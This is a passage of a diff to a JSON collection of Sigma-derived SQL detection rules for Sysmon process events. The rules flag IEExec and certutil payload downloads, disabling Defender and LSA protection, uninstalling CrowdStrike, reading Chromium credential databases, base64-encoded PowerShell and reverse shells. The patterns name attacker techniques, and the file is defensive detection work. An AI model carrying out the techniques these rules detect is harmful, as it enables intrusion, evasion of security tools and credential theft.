Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 